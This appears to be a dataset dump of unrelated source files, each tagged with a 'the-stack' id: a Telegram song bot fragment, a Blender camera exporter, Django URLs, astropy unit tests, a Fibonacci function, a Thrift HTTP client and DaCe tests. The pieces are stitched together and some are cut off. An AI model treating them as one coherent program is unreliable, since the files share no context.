👋 𝗛𝗲𝗹𝗹𝗼 [{}](tg://user?id={}),
\n\n𝗜 𝗔𝗺 🎸𝐒𝐨𝐧𝐠 𝐏𝐥𝐚𝐲 𝐁𝐨𝐭[🎶](https://telegra.ph/file/6cb884fe1cb943ec12df1.mp4)
I'M Music Bot By @Arishem_TheJudge 🤖
𝗦𝗲𝗻𝗱 𝗧𝗵𝗲 𝗡𝗮𝗺𝗲 𝗢𝗳 𝗧𝗵𝗲 𝗦𝗼𝗻𝗴 𝗬𝗼𝘂 𝗪𝗮𝗻𝘁... 😍🥰🤗
𝐄𝐠. ```/song Faded```
"""
owner_help = """
/blacklist user_id
/unblacklist user_id
/broadcast message to send
/eval python code
/chatlist get list of all chats
"""
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("start"))
async def start(client, message):
chat_id = message.chat.id
user_id = message.from_user["id"]
name = message.from_user["first_name"]
if message.chat.type == "private":
btn = InlineKeyboardMarkup(
[[InlineKeyboardButton(text="𝐒𝐔𝐏𝐏𝐎𝐑𝐓 👬", url="https://t.me/Ott_streaming_updates"),
InlineKeyboardButton(
text="𝐀𝐃𝐃 𝐌𝐄 🤗", url="http://t.me/SongProBot?startgroup=true"
)
]
]
)
else:
btn = None
await message.reply(start_text.format(name, user_id), reply_markup=btn)
add_chat_to_db(str(chat_id))
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("help"))
async def help(client, message):
if message.from_user["id"] == OWNER_ID:
await message.reply(owner_help)
return ""
text = "𝗦𝗲𝗻𝗱 𝗧𝗵𝗲 𝗡𝗮𝗺𝗲 𝗢𝗳 𝗧𝗵𝗲 𝗦𝗼𝗻𝗴 𝗬𝗼𝘂 𝗪𝗮𝗻𝘁... 😍🥰🤗\n /song (song name) 🥳"
await message.reply(text)
OWNER_ID.append(1492186775)
app.start()
LOGGER.info("SongPlayRoBot Is Now Working🤗🤗🤗")
idle()
|
the-stack_0_3707 | from sqlalchemy.orm import Session
from aspen.database.models import CanSee, DataType
from aspen.test_infra.models.usergroup import group_factory
def test_can_see_constructor_with_datatype(session: Session):
"""Test that we can construct a CanSee object with a `data_type` argument."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(viewer_group=group1, owner_group=group2, data_type=DataType.TREES)
session.add_all((group1, group2, can_see))
session.flush()
assert can_see.data_type == DataType.TREES
def test_can_see_datatype_filter(session: Session):
"""Test that we can filter by the datatype."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(
viewer_group=group1,
owner_group=group2,
data_type=DataType.TREES,
)
session.add_all((group1, group2, can_see))
session.flush()
session.query(CanSee).filter(CanSee.data_type == DataType.TREES).one()
|
the-stack_0_3710 | import gc
import math
import os
import struct
import bpy, bpy.props, bpy.ops
import mathutils
from io_scene_valvesource import utils as vs_utils
# <summary> Formats a float value to be suitable for bvh output </summary>
def FloatToBvhString(value):
return "{0:f}".format(value)
def WriteHeader(file, frames, frameTime):
file.write("advancedfx Cam\n")
file.write("version 1\n")
file.write("scaleFov none\n")
    file.write("channels time xPosition yPosition zPosition xRotation yRotation zRotation fov\n")
file.write("DATA\n")
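    # Each DATA row written later follows the channel order above, e.g. (made-up
    # values): 0.016667 12.5 -3.0 160.0 0.0 -12.5 90.0 73.7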
class CamExporter(bpy.types.Operator, vs_utils.Logger):
bl_idname = "advancedfx.camexporter"
bl_label = "HLAE Camera IO (.cam)"
bl_options = {'UNDO'}
# Properties used by the file browser
filepath: bpy.props.StringProperty(subtype="FILE_PATH")
    filename_ext = ".cam"
filter_glob: bpy.props.StringProperty(default="*.cam", options={'HIDDEN'})
# Custom properties
global_scale: bpy.props.FloatProperty(
name="Scale",
description="Scale everything by this value",
min=0.000001, max=1000000.0,
soft_min=1.0, soft_max=1000.0,
default=100.0,
)
frame_start: bpy.props.IntProperty(
name="Start Frame",
description="Starting frame to export",
default=0,
)
frame_end: bpy.props.IntProperty(
name="End Frame",
description="End frame to export",
default=0,
)
def execute(self, context):
ok = self.writeBvh(context)
self.errorReport("Error report")
return {'FINISHED'}
def invoke(self, context, event):
self.frame_start = context.scene.frame_start
self.frame_end = context.scene.frame_end
bpy.context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def writeBvh(self, context):
scene = context.scene
frame_current = scene.frame_current
fps = context.scene.render.fps
obj = context.active_object
if (obj is None) or (obj.type != 'CAMERA'):
self.error("No camera selected.")
return False
cam = obj.data
lastRot = None
unRot = mathutils.Matrix.Rotation(math.radians(-90.0), 4, 'X')
file = None
try:
file = open(self.filepath, "w", encoding="utf8", newline="\n")
frameCount = self.frame_end -self.frame_start +1
if frameCount < 0: frameCount = 0
frameTime = 1.0
if 0.0 != fps: frameTime = frameTime / fps
WriteHeader(file, frameCount, frameTime)
for frame in range(self.frame_start, self.frame_end + 1):
scene.frame_set(frame)
mat = obj.matrix_world
mat = mat @ unRot
loc = mat.to_translation()
rot = mat.to_euler('YXZ') if lastRot is None else mat.to_euler('YXZ', lastRot)
lastRot = rot
loc = self.global_scale * mathutils.Vector((loc[1],-loc[0],loc[2]))
qAngleVec = mathutils.Vector((math.degrees(rot[1]),-math.degrees(rot[0]),math.degrees(rot[2])))
# lens = camData.c.sensor_width / (2.0 * math.tan(math.radians(fov) / 2.0))
fov = math.degrees(2.0 * math.atan((cam.sensor_width / cam.lens) / 2.0))
S = ""+FloatToBvhString((frame-1) * frameTime) +" " +FloatToBvhString(loc[0]) +" " +FloatToBvhString(loc[1]) +" " +FloatToBvhString(loc[2]) +" " +FloatToBvhString(qAngleVec[0]) +" " +FloatToBvhString(qAngleVec[1]) +" " +FloatToBvhString(qAngleVec[2]) +" " +FloatToBvhString(fov) + "\n"
file.write(S)
finally:
if file is not None:
file.close()
scene.frame_set(frame_current)
return True
|
the-stack_0_3711 | """museumadmin URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from adminapp import views as adminapp_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', adminapp_views.index, name="Homepage" ),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('dj-rest-auth/', include('dj_rest_auth.urls')),
path('dj-rest-auth/registration/', include('dj_rest_auth.registration.urls'))
]
|
the-stack_0_3714 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Regression tests for the units.format package
"""
import pytest
from numpy.testing import assert_allclose
from astropy.tests.helper import catch_warnings
from astropy import units as u
from astropy.constants import si
from astropy.units import core
from astropy.units import format as u_format
from astropy.units.utils import is_effectively_unity
@pytest.mark.parametrize('strings, unit', [
(["m s", "m*s", "m.s"], u.m * u.s),
(["m/s", "m*s**-1", "m /s", "m / s", "m/ s"], u.m / u.s),
(["m**2", "m2", "m**(2)", "m**+2", "m+2", "m^(+2)"], u.m ** 2),
(["m**-3", "m-3", "m^(-3)", "/m3"], u.m ** -3),
(["m**(1.5)", "m(3/2)", "m**(3/2)", "m^(3/2)"], u.m ** 1.5),
(["2.54 cm"], u.Unit(u.cm * 2.54)),
(["10+8m"], u.Unit(u.m * 1e8)),
# This is the VOUnits documentation, but doesn't seem to follow the
# unity grammar (["3.45 10**(-4)Jy"], 3.45 * 1e-4 * u.Jy)
(["sqrt(m)"], u.m ** 0.5),
(["dB(mW)", "dB (mW)"], u.DecibelUnit(u.mW)),
(["mag"], u.mag),
(["mag(ct/s)"], u.MagUnit(u.ct / u.s)),
(["dex"], u.dex),
(["dex(cm s**-2)", "dex(cm/s2)"], u.DexUnit(u.cm / u.s**2))])
def test_unit_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.Generic.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', ['sin( /pixel /s)', 'mag(mag)',
'dB(dB(mW))', 'dex()'])
def test_unit_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.Generic.parse(string)
@pytest.mark.parametrize('strings, unit', [
(["0.1nm"], u.AA),
(["mW/m2"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["mW/(m2)"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["km/s", "km.s-1"], u.km / u.s),
(["10pix/nm"], u.Unit(10 * u.pix / u.nm)),
(["1.5x10+11m"], u.Unit(1.5e11 * u.m)),
(["1.5×10+11m"], u.Unit(1.5e11 * u.m)),
(["m2"], u.m ** 2),
(["10+21m"], u.Unit(u.m * 1e21)),
(["2.54cm"], u.Unit(u.cm * 2.54)),
(["20%"], 0.20 * u.dimensionless_unscaled),
(["10+9"], 1.e9 * u.dimensionless_unscaled),
(["2x10-9"], 2.e-9 * u.dimensionless_unscaled),
(["---"], u.dimensionless_unscaled),
(["ma"], u.ma),
(["mAU"], u.mAU),
(["uarcmin"], u.uarcmin),
(["uarcsec"], u.uarcsec),
(["kbarn"], u.kbarn),
(["Gbit"], u.Gbit),
(["Gibit"], 2 ** 30 * u.bit),
(["kbyte"], u.kbyte),
(["mRy"], 0.001 * u.Ry),
(["mmag"], u.mmag),
(["Mpc"], u.Mpc),
(["Gyr"], u.Gyr),
(["°"], u.degree),
(["°/s"], u.degree / u.s),
(["Å"], u.AA),
(["Å/s"], u.AA / u.s),
(["\\h"], si.h)])
def test_cds_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.CDS.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'0.1 nm',
'solMass(3/2)',
'km / s',
'km s-1',
'pix0.1nm',
'pix/(0.1nm)',
'km*s',
'km**2',
'5x8+3m',
'0.1---',
'---m',
'm---',
'mag(s-1)',
'dB(mW)',
'dex(cm s-2)'])
def test_cds_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.CDS.parse(string)
# These examples are taken from the EXAMPLES section of
# https://heasarc.gsfc.nasa.gov/docs/heasarc/ofwg/docs/general/ogip_93_001/
@pytest.mark.parametrize('strings, unit', [
(["count /s", "count/s", "count s**(-1)", "count / s", "count /s "],
u.count / u.s),
(["/pixel /s", "/(pixel * s)"], (u.pixel * u.s) ** -1),
(["count /m**2 /s /eV", "count m**(-2) * s**(-1) * eV**(-1)",
"count /(m**2 * s * eV)"],
u.count * u.m ** -2 * u.s ** -1 * u.eV ** -1),
(["erg /pixel /s /GHz", "erg /s /GHz /pixel", "erg /pixel /(s * GHz)"],
u.erg / (u.s * u.GHz * u.pixel)),
(["keV**2 /yr /angstrom", "10**(10) keV**2 /yr /m"],
# Though this is given as an example, it seems to violate the rules
# of not raising scales to powers, so I'm just excluding it
# "(10**2 MeV)**2 /yr /m"
u.keV**2 / (u.yr * u.angstrom)),
(["10**(46) erg /s", "10**46 erg /s", "10**(39) J /s", "10**(39) W",
"10**(15) YW", "YJ /fs"],
10**46 * u.erg / u.s),
(["10**(-7) J /cm**2 /MeV", "10**(-9) J m**(-2) eV**(-1)",
"nJ m**(-2) eV**(-1)", "nJ /m**2 /eV"],
10 ** -7 * u.J * u.cm ** -2 * u.MeV ** -1),
(["sqrt(erg /pixel /s /GHz)", "(erg /pixel /s /GHz)**(0.5)",
"(erg /pixel /s /GHz)**(1/2)",
"erg**(0.5) pixel**(-0.5) s**(-0.5) GHz**(-0.5)"],
(u.erg * u.pixel ** -1 * u.s ** -1 * u.GHz ** -1) ** 0.5),
(["(count /s) (/pixel /s)", "(count /s) * (/pixel /s)",
"count /pixel /s**2"],
(u.count / u.s) * (1.0 / (u.pixel * u.s)))])
def test_ogip_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.OGIP.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'log(photon /m**2 /s /Hz)',
'sin( /pixel /s)',
'log(photon /cm**2 /s /Hz) /(sin( /pixel /s))',
'log(photon /cm**2 /s /Hz) (sin( /pixel /s))**(-1)',
'dB(mW)', 'dex(cm/s**2)'])
def test_ogip_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.OGIP.parse(string)
@pytest.mark.parametrize('unit', [val for key, val in u.__dict__.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip(unit):
a = core.Unit(unit.to_string('generic'), format='generic')
b = core.Unit(unit.decompose().to_string('generic'), format='generic')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.VOUnit._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_vo_unit(unit):
a = core.Unit(unit.to_string('vounit'), format='vounit')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
if unit not in (u.mag, u.dB):
ud = unit.decompose().to_string('vounit')
assert ' ' not in ud
b = core.Unit(ud, format='vounit')
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.Fits._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_fits(unit):
s = unit.to_string('fits')
a = core.Unit(s, format='fits')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.CDS._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_cds(unit):
a = core.Unit(unit.to_string('cds'), format='cds')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('cds'), format='cds')
    except ValueError:  # skip mag: decomposes into dex, unknown to CDS
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.OGIP._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_ogip(unit):
a = core.Unit(unit.to_string('ogip'), format='ogip')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('ogip'), format='ogip')
except ValueError: # skip mag: decomposes into dex, unknown to OGIP
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
def test_fits_units_available():
u_format.Fits._units
def test_vo_units_available():
u_format.VOUnit._units
def test_cds_units_available():
u_format.CDS._units
def test_cds_non_ascii_unit():
"""Regression test for #5350. This failed with a decoding error as
μas could not be represented in ascii."""
from astropy.units import cds
with cds.enable():
u.radian.find_equivalent_units(include_prefix_units=True)
def test_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert fluxunit.to_string('latex') == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_new_style_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert "{0:latex}".format(fluxunit) == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_latex_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex = r'$\mathrm{1 \times 10^{-24}\,\frac{erg}{Hz\,s\,cm^{2}}}$'
assert fluxunit.to_string('latex') == latex
def test_latex_inline_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex_inline = (r'$\mathrm{1 \times 10^{-24}\,erg'
r'\,Hz^{-1}\,s^{-1}\,cm^{-2}}$')
assert fluxunit.to_string('latex_inline') == latex_inline
@pytest.mark.parametrize('format_spec, string', [
('generic', 'erg / (cm2 s)'),
('s', 'erg / (cm2 s)'),
('console', ' erg \n ------\n s cm^2'),
('latex', '$\\mathrm{\\frac{erg}{s\\,cm^{2}}}$'),
('latex_inline', '$\\mathrm{erg\\,s^{-1}\\,cm^{-2}}$'),
('>20s', ' erg / (cm2 s)')])
def test_format_styles(format_spec, string):
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert format(fluxunit, format_spec) == string
def test_flatten_to_known():
myunit = u.def_unit("FOOBAR_One", u.erg / u.Hz)
assert myunit.to_string('fits') == 'erg Hz-1'
myunit2 = myunit * u.bit ** 3
assert myunit2.to_string('fits') == 'bit3 erg Hz-1'
def test_flatten_impossible():
myunit = u.def_unit("FOOBAR_Two")
with u.add_enabled_units(myunit), pytest.raises(ValueError):
myunit.to_string('fits')
def test_console_out():
"""
Issue #436.
"""
u.Jy.decompose().to_string('console')
def test_flexible_float():
assert u.min._represents.to_string('latex') == r'$\mathrm{60\,s}$'
def test_fraction_repr():
area = u.cm ** 2.0
assert '.' not in area.to_string('latex')
fractional = u.cm ** 2.5
assert '5/2' in fractional.to_string('latex')
assert fractional.to_string('unicode') == 'cm⁵⸍²'
def test_scale_effectively_unity():
"""Scale just off unity at machine precision level is OK.
Ensures #748 does not recur
"""
a = (3. * u.N).cgs
assert is_effectively_unity(a.unit.scale)
assert len(a.__repr__().split()) == 3
def test_percent():
"""Test that the % unit is properly recognized. Since % is a special
symbol, this goes slightly beyond the round-tripping tested above."""
assert u.Unit('%') == u.percent == u.Unit(0.01)
assert u.Unit('%', format='cds') == u.Unit(0.01)
assert u.Unit(0.01).to_string('cds') == '%'
with pytest.raises(ValueError):
u.Unit('%', format='fits')
with pytest.raises(ValueError):
u.Unit('%', format='vounit')
def test_scaled_dimensionless():
"""Test that scaled dimensionless units are properly recognized in generic
and CDS, but not in fits and vounit."""
assert u.Unit('0.1') == u.Unit(0.1) == 0.1 * u.dimensionless_unscaled
assert u.Unit('1.e-4') == u.Unit(1.e-4)
assert u.Unit('10-4', format='cds') == u.Unit(1.e-4)
assert u.Unit('10+8').to_string('cds') == '10+8'
with pytest.raises(ValueError):
u.Unit(0.15).to_string('fits')
assert u.Unit(0.1).to_string('fits') == '10**-1'
with pytest.raises(ValueError):
u.Unit(0.1).to_string('vounit')
def test_deprecated_did_you_mean_units():
try:
u.Unit('ANGSTROM', format='fits')
except ValueError as e:
assert 'Did you mean Angstrom or angstrom?' in str(e)
try:
u.Unit('crab', format='ogip')
except ValueError as e:
assert 'Crab (deprecated)' in str(e)
assert 'mCrab (deprecated)' in str(e)
try:
u.Unit('ANGSTROM', format='vounit')
except ValueError as e:
assert 'angstrom (deprecated)' in str(e)
assert '0.1nm' in str(e)
assert str(e).count('0.1nm') == 1
with catch_warnings() as w:
u.Unit('angstrom', format='vounit')
assert len(w) == 1
assert '0.1nm' in str(w[0].message)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_fits_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.Fits().parse(string)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_vounit_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.VOUnit().parse(string)
def test_vounit_binary_prefix():
u.Unit('KiB', format='vounit') == u.Unit('1024 B')
u.Unit('Kibyte', format='vounit') == u.Unit('1024 B')
u.Unit('Kibit', format='vounit') == u.Unit('1024 B')
with catch_warnings() as w:
u.Unit('kibibyte', format='vounit')
assert len(w) == 1
def test_vounit_unknown():
assert u.Unit('unknown', format='vounit') is None
assert u.Unit('UNKNOWN', format='vounit') is None
assert u.Unit('', format='vounit') is u.dimensionless_unscaled
def test_vounit_details():
assert u.Unit('Pa', format='vounit') is u.Pascal
# The da- prefix is not allowed, and the d- prefix is discouraged
assert u.dam.to_string('vounit') == '10m'
assert u.Unit('dam dag').to_string('vounit') == '100g m'
def test_vounit_custom():
x = u.Unit("'foo' m", format='vounit')
x_vounit = x.to_string('vounit')
assert x_vounit == "'foo' m"
x_string = x.to_string()
assert x_string == "foo m"
x = u.Unit("m'foo' m", format='vounit')
assert x.bases[1]._represents.scale == 0.001
x_vounit = x.to_string('vounit')
assert x_vounit == "m m'foo'"
x_string = x.to_string()
assert x_string == 'm mfoo'
def test_vounit_implicit_custom():
x = u.Unit("furlong/week", format="vounit")
assert x.bases[0]._represents.scale == 1e-15
assert x.bases[0]._represents.bases[0].name == 'urlong'
def test_fits_scale_factor():
with pytest.raises(ValueError):
x = u.Unit('1000 erg/s/cm**2/Angstrom', format='fits')
with pytest.raises(ValueError):
x = u.Unit('12 erg/s/cm**2/Angstrom', format='fits')
x = u.Unit('10+2 erg/s/cm**2/Angstrom', format='fits')
assert x == 100 * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**2 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20)*erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
x = u.Unit(1.2 * u.erg)
with pytest.raises(ValueError):
x.to_string(format='fits')
x = u.Unit(100.0 * u.erg)
assert x.to_string(format='fits') == '10**2 erg'
|
the-stack_0_3715 | def fibonacciSequence(N):
result = []
previous = 1
previousPrevious = 1
result.append(1)
result.append(1)
    # result already holds the first two terms, so N - 2 more iterations give N terms in total
    for i in range(N - 2):
current = previous + previousPrevious
result.append(current)
previousPrevious = previous
previous = current
return result
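# Sanity check (sketch): the first five Fibonacci terms.
assert fibonacciSequence(5) == [1, 1, 2, 3, 5]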
print(fibonacciSequence(100))
|
the-stack_0_3717 | """
Copyright (c) 2019 4masaka
This software is released under the MIT License.
https://opensource.org/licenses/MIT
"""
from typing import Dict, Optional
import aiohttp
from frugal.aio.transport import FTransportBase
from frugal.context import FContext
from thrift.transport.TTransport import TMemoryBuffer, TTransportBase
class HttpClient(FTransportBase):
def __init__(
self, uri: str, headers: Optional[Dict] = None, request_capacity: int = 0
) -> None:
super().__init__(request_capacity)
self.uri = uri
self.headers = {
"Content-Type": "application/x-thrift",
"Accept": "application/x-thrift",
}
        self.headers.update(headers or {})  # tolerate headers=None (the default)
def is_open(self) -> bool:
return True
    def open(self) -> bool:
return True
    async def close(self) -> None:
        raise NotImplementedError()
    async def oneway(self, context, payload):
        raise NotImplementedError()
    async def set_monitor(self, monitor):
        raise NotImplementedError()
async def request(self, context: FContext, payload) -> TTransportBase:
payload = payload[4:]
async with aiohttp.request(
"POST",
url=self.uri,
data=payload,
headers=self.headers
) as res:
return TMemoryBuffer(await res.content.read())
class HttpClientFactory:
def __init__(self, host: str, port: int = 443, scheme: str = "https"):
self.host = host
self.port = port
self.scheme = scheme
def get_client(self, path: str, headers: Optional[Dict] = None) -> HttpClient:
uri = f"{self.scheme}://{self.host}:{self.port}{path}"
return HttpClient(uri, headers=headers)
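# Usage sketch (the host, path and header below are illustrative assumptions,
# not values defined in this module):
#   factory = HttpClientFactory("api.example.com")
#   client = factory.get_client("/service", headers={"X-Auth": "<token>"})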
|
the-stack_0_3718 | # Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Tests different allocation lifetimes. """
import pytest
import dace
from dace.codegen.targets import framecode
from dace.sdfg import infer_types
import numpy as np
N = dace.symbol('N')
def _test_determine_alloc(lifetime: dace.AllocationLifetime, unused: bool = False) -> dace.SDFG:
""" Creates an SDFG playground for determining allocation. """
sdfg = dace.SDFG('lifetimetest')
sdfg.add_array('A', [N], dace.float64)
sdfg.add_array('B', [N], dace.float64)
sdfg.add_transient('unused', [N], dace.float64, lifetime=lifetime)
state = sdfg.add_state()
me, mx = state.add_map('m', dict(i='0:N'))
#########################################################################
nsdfg = dace.SDFG('nested')
nsdfg.add_array('A', [N], dace.float64)
nsdfg.add_array('B', [N], dace.float64)
nsdfg.add_transient('tmp', [N], dace.float64, dace.StorageType.GPU_Global, lifetime=lifetime)
nsdfg.add_transient('tmp2', [1], dace.float64, dace.StorageType.Register, lifetime=lifetime)
nstate = nsdfg.add_state()
ime, imx = nstate.add_map('m2', dict(i='0:20'), schedule=dace.ScheduleType.GPU_Device)
t1 = nstate.add_access('tmp')
t2 = nstate.add_access('tmp2')
nstate.add_nedge(t1, t2, dace.Memlet('tmp[0]'))
nstate.add_memlet_path(nstate.add_read('A'), ime, t1, memlet=dace.Memlet('A[i]'))
nstate.add_memlet_path(t2, imx, nstate.add_write('B'), memlet=dace.Memlet('B[0]', wcr='lambda a,b: a+b'))
#########################################################################
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {'A'}, {'B'})
state.add_memlet_path(state.add_read('A'), me, nsdfg_node, dst_conn='A', memlet=dace.Memlet('A[0:N]'))
state.add_memlet_path(nsdfg_node, mx, state.add_write('B'), src_conn='B', memlet=dace.Memlet('B[0:N]'))
# Set default storage/schedule types in SDFG
infer_types.set_default_schedule_and_storage_types(sdfg, None)
return sdfg, (sdfg, state, me, nsdfg, nstate, ime)
def _check_alloc(id, name, codegen, scope):
# for sdfg_id, _, node in codegen.to_allocate[scope]:
# if id == sdfg_id and name == node.data:
# return True
for sdfg, _, node, _, _, _ in codegen.to_allocate[scope]:
if sdfg.sdfg_id == id and name == node.data:
return True
return False
def test_determine_alloc_scope():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Scope)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# tmp cannot be allocated within the inner scope because it is GPU_Global
assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-1])
def test_determine_alloc_state():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.State, unused=True)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# Ensure that unused transients are not allocated
assert not any('__0_unused' in field for field in codegen.statestruct)
assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-2])
def test_determine_alloc_sdfg():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.SDFG)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert _check_alloc(1, 'tmp', codegen, scopes[-3])
assert _check_alloc(1, 'tmp2', codegen, scopes[-3])
def test_determine_alloc_global():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Global)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert any('__1_tmp' in field for field in codegen.statestruct)
assert any('__1_tmp2' in field for field in codegen.statestruct)
assert _check_alloc(1, 'tmp', codegen, sdfg)
assert _check_alloc(1, 'tmp2', codegen, sdfg)
@pytest.mark.gpu
def test_persistent_gpu_copy_regression():
sdfg = dace.SDFG('copynd')
state = sdfg.add_state()
nsdfg = dace.SDFG('copynd_nsdfg')
nstate = nsdfg.add_state()
sdfg.add_array("input", [2, 2], dace.float64)
sdfg.add_array("input_gpu", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
sdfg.add_array("__return", [2, 2], dace.float64)
nsdfg.add_array("ninput", [2, 2],
dace.float64,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("transient_heap", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("noutput", [2, 2],
dace.float64,
storage=dace.dtypes.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
a_trans = nstate.add_access("transient_heap")
nstate.add_edge(nstate.add_read("ninput"), None, a_trans, None, nsdfg.make_array_memlet("transient_heap"))
nstate.add_edge(a_trans, None, nstate.add_write("noutput"), None, nsdfg.make_array_memlet("transient_heap"))
a_gpu = state.add_read("input_gpu")
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {"ninput"}, {"noutput"})
wR = state.add_write("__return")
state.add_edge(state.add_read("input"), None, a_gpu, None, sdfg.make_array_memlet("input"))
state.add_edge(a_gpu, None, nsdfg_node, "ninput", sdfg.make_array_memlet("input_gpu"))
state.add_edge(nsdfg_node, "noutput", wR, None, sdfg.make_array_memlet("__return"))
result = sdfg(input=np.ones((2, 2), dtype=np.float64))
assert np.all(result == np.ones((2, 2)))
@pytest.mark.gpu
def test_persistent_gpu_transpose_regression():
@dace.program
def test_persistent_transpose(A: dace.float64[5, 3]):
return np.transpose(A)
sdfg = test_persistent_transpose.to_sdfg()
sdfg.expand_library_nodes()
sdfg.simplify()
sdfg.apply_gpu_transformations()
